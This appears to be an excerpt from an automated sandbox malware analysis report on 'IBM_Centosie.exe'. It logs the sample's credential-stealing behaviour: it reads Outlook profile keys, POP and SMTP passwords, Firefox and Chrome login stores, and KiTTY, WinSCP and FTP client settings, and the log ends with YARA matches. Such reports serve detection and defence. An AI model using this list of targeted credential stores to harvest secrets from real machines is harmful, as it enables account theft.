Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: PopPassword 5_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: SmtpPassword 5_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY